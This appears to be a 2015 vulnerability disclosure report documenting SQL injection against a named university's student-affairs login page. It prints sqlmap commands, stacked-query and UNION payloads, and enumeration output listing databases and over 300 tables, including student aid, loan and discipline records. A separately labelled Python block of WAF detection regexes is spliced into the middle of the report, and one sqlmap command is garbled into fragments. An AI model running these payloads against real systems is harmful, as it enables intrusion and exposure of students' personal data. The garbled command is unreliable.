2015-09-14: Details sent to the vendor, awaiting vendor handling
2015-09-14: Vendor has confirmed; details disclosed to the vendor only
2015-09-24: Details disclosed to core white hats and relevant domain experts
2015-10-04: Details disclosed to regular white hats
2015-10-14: Details disclosed to intern white hats
2015-10-29: Details disclosed to the public
A POST injection vulnerability exists; the injection succeeded and could be exploited.
http://**.**.**.**/Login/loginpageforstudentb.aspx
The POST parameters were captured with Firefox.
C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/Login/loginpageforuserb.aspx?LogoutURL=%2flogin" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=%2FwEWBALRycKqBAKz8dy8BQKd%2B7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj%2BEh1&txtUserId=admin&txtPwd=admin&Button1=%E7%99%BB+%E5%BD%95"

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtUserId (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=/wEWBALRycKqBAKz8dy8BQKd 7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj Eh1&txtUserId=admin';WAITFOR DELAY '0:0:5'--&txtPwd=admin&Button1=%E7%99%BB %E5%BD%95

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=/wEWBALRycKqBAKz8dy8BQKd 7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj Eh1&txtUserId=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113) CHAR(122) CHAR(112) CHAR(113) CHAR(113) CHAR(65) CHAR(100) CHAR(120) CHAR(106) CHAR(113) CHAR(71) CHAR(108) CHAR(120) CHAR(109) CHAR(105) CHAR(113) CHAR(113) CHAR(107) CHAR(118) CHAR(113),NULL-- &txtPwd=admin&Button1=%E7%99%BB %E5%BD%95
---
[23:14:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
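The two payloads sqlmap reports above (a stacked `WAITFOR DELAY` and a `UNION ALL SELECT NULL,...` column probe with a `CHAR()` marker chain) have a recognisable shape inside the form body, and that shape is what a reverse proxy or WAF that logs POST bodies can alert on. The following Python example is added here and is not part of the report or the vendor's software: it decodes an `application/x-www-form-urlencoded` body, checks only the free-text login fields (`txtUserId`, `txtPwd`, the names from the request above; `__VIEWSTATE` is deliberately skipped because base64 would false-positive), and returns which signature matched. The sample bodies are constructed, not captured traffic.

```python
import re
from urllib.parse import parse_qs, urlencode

# Signatures for the value shapes sqlmap used against txtUserId above:
# time-delay stacked query, UNION column probe, CHAR() marker chain,
# and a quote immediately followed by a comment marker.
SIGNATURES = [
    ("stacked-query time delay", re.compile(r"';\s*WAITFOR\s+DELAY", re.I)),
    ("UNION column probe", re.compile(r"'\s*UNION\s+ALL\s+SELECT\s+NULL", re.I)),
    ("CHAR() marker chain", re.compile(r"(CHAR\(\d+\)\+?\s*){4,}", re.I)),
    ("quote followed by comment", re.compile(r"'\s*--")),
]

# Free-text fields from the login form; never expected to contain SQL syntax.
WATCHED_FIELDS = {"txtUserId", "txtPwd"}

# Constructed sample bodies (hypothetical, not captured traffic): the benign
# login from the request above, a legitimate apostrophe, and two values shaped
# like sqlmap's payloads. urlencode() percent-encodes quotes, '+' and ';'.
SAMPLE_BODIES = {
    "benign": urlencode({"__VIEWSTATE": "/wEPDw+abc==", "txtUserId": "admin",
                         "txtPwd": "admin"}),
    "apostrophe": urlencode({"txtUserId": "o'neil", "txtPwd": "x"}),
    "time_delay": urlencode({"txtUserId": "admin';WAITFOR DELAY '0:0:5'--",
                             "txtPwd": "admin"}),
    "union_probe": urlencode({"txtUserId": "admin' UNION ALL SELECT NULL,NULL,NULL,NULL,"
                                           "CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113),NULL-- ",
                              "txtPwd": "admin"}),
}


def inspect_body(body):
    """Decode a form-encoded POST body and return a sorted list of
    (field, signature_name) for every watched field that matches."""
    fields = parse_qs(body, keep_blank_values=True)
    hits = []
    for name in WATCHED_FIELDS:
        for value in fields.get(name, []):
            for label, pattern in SIGNATURES:
                if pattern.search(value):
                    hits.append((name, label))
    return sorted(hits)


if __name__ == "__main__":
    for tag, body in SAMPLE_BODIES.items():
        print(tag, inspect_body(body))
```

The apostrophe case is the point of keying on SQL syntax rather than on quotes alone: a user named `o'neil` produces no hit, while both sqlmap shapes do. The regexes tolerate `+` as well as space between `CHAR()` terms because a proxy that form-decodes the body before logging turns `+` into a space, which is also why the payloads printed above show spaces.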
POST injection confirmed.
C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/Login/loginpageforuserb.aspx?LogoutURL=%2flogin" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=%2FwEWBALRycKqBAKz8dy8BQKd%2B7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj%2BEh1&txtUserId=admin&txtPwd=admin&Button1=%E7%99%BB+%E5%BD%95" --dbs

[23:16:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[23:16:55] [INFO] fetching database names
[23:16:55] [INFO] the SQL query used returns 8 entries
[23:16:55] [INFO] resumed: master
[23:16:55] [INFO] resumed: model
[23:16:55] [INFO] resumed: msdb
[23:16:55] [INFO] resumed: Northwind
[23:16:55] [INFO] resumed: pubs
[23:16:55] [INFO] resumed: StudWork
[23:16:55] [INFO] resumed: tempdb
[23:16:55] [INFO] resumed: 长安大学_学工在线
available databases [8]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWork
[*] tempdb
[*] 长安大学_学工在线
With the databases enumerated, I picked one at random and took a look.
C:\Python27\sqlmap>sqlmap.py -px?LogoutURL=%2flogin" --dataPDwUKLTMzNDE0ODA3Mg9kFgICAw9kF4%2FlhYHorrjmnIDlpJrovpPlhaXlr%2Bk2BWFpeiLseaWh%2BWNleW8leW3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU4jeiDveS4uuepugril4%2FlhYHorrjbyPOuS4jeWFgeiuuOi%2Bk%2BWFpei3IyTBvPEM&__EVENTVALIDATION=%2a2ks2iURfMhj%2BEh1&txtUserId=a长安大学_学工在线 --tables

Database: 长安大学_学工在线
[309 tables]
+----------------------------+
| LUMIGENT_PROFILER |
| VoteList |
| Vsign_AgtRegistryFell |
| Vsign_AgtRegistryFell |
| Vsign_AgtRegistryOrder |
| Vdorm_buildingInfo【不用】 |
| Vdorm_buildingInfo【不用】 |
| tDorm_User不用 |
| tEmp_pblDocument? |
| tEmp_pblEmploymentType? |
| tEmp_pblFriendlyConnect? |
| tEmp_pblMessageInfo? |
| tEmp_pblNewsPic? |
| tEmp_pblRelTopicMsg? |
| tEmp_pblTopic? |
| tEmp_studDepartment(不用,暂 |
| tEmp_studStudFavorite? |
| vDorm_OccupiedRoom不用 |
| dtproperties |
| sysconstraints |
| syssegments |
| tAcc_File |
| tCadreGroup_state |
| tCadre_dimission |
| tDerate_Temp |
| tDorm_Bed |
| tDorm_Building |
| tDorm_History |
| tDorm_RewardHistory |
| tDorm_Room |
| tDorm_RoomType |
| tEmp_BothMeeting |
| tEmp_BothMeetingUnit |
| tEmp_BothMeetingUnitSpec |
| tEmp_ViewCounter |
| tEmp_codeComputerLevel |
| tEmp_codeForeignLanguage |
| tEmp_codeIdentity |
| tEmp_codeLiteracyDegree |
| tEmp_codeMandarin |
| tEmp_codeUnitEconomyType |
| tEmp_codeUnitLevel |
| tEmp_codeUnitSubjection |
| tEmp_codeUnitTrade |
| tEmp_codeUnitType |
| tEmp_codeWageManageType |
| tEmp_gbRegionalism |
| tEmp_gbWedlock |
| tEmp_pblDeptDate |
| tEmp_pblEmployment |
| tEmp_pblSpecIntro |
| tEmp_signAgtRegistry |
| tEmp_studAcc |
| tEmp_studFavorite |
| tEmp_studFocusFromEnt |
| tEmp_studIntro |
| tEmp_studTouch |
| tEmp_unitBaseInfo |
| tEmp_unitCompanyAcc |
| tEmp_unitCorpEmploy |
| tEmp_unitCorpFavorite |
| tEmp_unitCorpPublicize |
| tEmp_unitEntrLoginInfo |
| tEmp_unitFocusFromStudents |
| tFile_Video |
| tGreen_Apply |
| tMin_Activity |
| tMin_InMoney |
| tMin_OutMoney |
| tMin_Visit |
| tPoor_Student |
| tPopedom_Atom |
| tSim_Appraise |
| tSim_Punish |
| tSim_Reward |
| tStudCadre_Info |
| tStudCadre_Type |
| tStudCadre_Unit |
| tStud_AllowApply |
| tTemp_Apply |
| tarm_AwardList |
| tarm_StudCourse |
| tarm_StudLevy |
| tarm_StudRecord |
| tarm_policy |
| tarrear_enrol |
| tarrear_ratify |
| tarrear_repay |
| tasl_Affirm |
| tasl_BankAuditing |
| tasl_BankAuditing |
| tasl_BankBargain |
| tasl_Breach |
| tasl_Compensate |
| tasl_End |
| tasl_Estate |
| tasl_Extend |
| tasl_Familial |
| tasl_Imburse |
| tasl_LoanType |
| tasl_Postponed |
| tasl_SchoolAuditingIdea |
| tasl_SchoolAuditingIdea |
| tasl_StudRequisition |
| tasl_Whither |
| tbase_Department |
| tbase_Teacher |
| tbase_User |
| tborrow_enrol |
| tborrow_ratify |
| tborrow_repay |
| tcard_MakeCard |
| tcgb_Folk |
| tcgb_PolityVisage |
| tcgb_Regionalism |
| tcgt_AwardGrade |
| tcgt_AwardList |
| tcgt_ClassRelation |
| tcgt_StudCourse |
| tcgt_StudRecord |
| tcgt_stdResultCell |
| tcgt_stdScale |
| tcmoe_BloodType |
| tcmoe_Emigrant |
| tcmoe_PunishType |
| tcmoe_RewardLevel |
| tcmoe_RewardType |
| tcode_Academic |
| tcode_Aspect |
| tcode_Degree |
| tcode_LenOfSchool |
| tcode_Post |
| tcode_PsychologyLevel |
| tcode_RewardItem |
| tcode_StudType |
| tcode_poorType |
| tcpt_BranchActivity |
| tcpt_ClassRelation |
| tcpt_Document |
| tcpt_MemberStudy |
| tcpt_PartyActive |
| tcpt_PartyBranch |
| tcpt_PartyMember |
| tcpt_PartyPrep |
| tcpt_PersonRelation |
| tcpt_Requisition |
| tderate_AuditSchooling |
| tderate_RegSchooling |
| tdm_ZZMM |
| tev_ClassAssess |
| tev_ClassAssessTemp |
| tev_EvaluatingItem |
| tev_EvaluatingType |
| tev_StudAssess |
| tev_StudAssessTemp |
| tgreen_Charge |
| tgreen_temp |
| tins_InsCompany |
| tins_InsGrade |
| tins_InsItem |
| tins_InsPayForMoney |
| tins_InsRegStudent |
| titem_DeregType |
| titem_PartyBranchType |
| titem_PartyMemberType |
| titem_PartySchoolType |
| tlv_Procedure |
| tlv_RegForAbnormity |
| tlv_RegForGraduate |
| tlv_Schema |
| tmem_BookEnrol |
| tmem_ChooseCadre |
| tmem_DevelopmentNum |
| tmem_DevelopmentNum |
| tmem_MemBerDocment |
| tmem_MemBerDocment |
| tmem_MemCharge |
| tmem_OrgType |
| tmem_PartyNum |
| tmem_PartyNum |
| tmem_Record |
| tmem_Rewards |
| tmem_TrainDepartment |
| tmem_TrainManInfo |
| tmem_orgMan |
| tmem_organization |
| tmema_ActivityApply |
| tmema_ActivityAudit |
| tmema_ActivityField |
| tmema_AssnJob |
| tmema_AssnMember |
| tmemp_Activity |
| tmemp_ComAuthor |
| tmemp_ComManuscript |
| tmemp_ComReport |
| tmemp_PublicationIssue |
| tmemp_PulicJob |
| tpbl_SpecIntro |
| tpoor_poorStudent |
| tpopedom_UserBackManage |
| tpopedom_UserModule |
| tpsy_BBSMain |
| tpsy_BBSRestore |
| tpsy_Dossier |
| tpsy_Emphases |
| tpsy_Preengage |
| tpsy_Talk |
| tpsy_Work |
| tpunish_Information |
| tpunish_Repeal |
| treward_Information |
| treward_Repeal |
| treward_Type |
| tschol_Annotion |
| tschol_Apply |
| tschol_Classify |
| tschol_Quotas |
| tschol_RankObj |
| tstipend_Annotion |
| tstipend_Apply |
| tstipend_Classify |
| tstipend_Quotas |
| tstipend_RankObj |
| tstud_Educate |
| tstud_Family |
| tstud_Graduate |
| tstud_Member |
| tstud_Student |
| tsubsidy_Annotion |
| tsubsidy_Apply |
| tsubsidy_Classify |
| tsubsidy_Quotas |
| tsubsidy_RankObj |
| tsys_BackUp |
| tsys_Download |
| tsys_EmpNavigation |
| tsys_FriendlyLink |
| tsys_Message |
| tsys_Modules_测试 |
| tsys_Modules_长安大学 |
| tsys_NoticeInterface |
| tsys_NoticeInterface |
| tsys_NoticeType |
| tsys_NoticeType长安大学 |
| tsys_Options |
| tsys_VoteList |
| tsys_VoteProject |
| tsys_VoteRen |
| tsys_loginLog |
| tsys_loginSession |
| twl_WorkLog |
| twork_Apply |
| twork_CheckIn |
| twork_PayMoney |
| twork_PostObj |
| twork_PostType |
| vAloan_ListAff |
| vAloan_ListBasic |
| vAloan_ListExtend |
| vDerate_green_Stat |
| vDorm_AllRoomDetail |
| vDorm_Bed |
| vDorm_CanBePreared |
| vDorm_CanUseBed |
| vDorm_Preared |
| vDorm_UsedBed |
| vDorm_room |
| vDorm_student |
+----------------------------+
More than three hundred tables in all; there is far too much in there, and I had no interest in studying or probing any further. So this is where it ends.
SQL injection also takes patience and persistence.
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2015-09-14 12:55
Notified, pending handling
None yet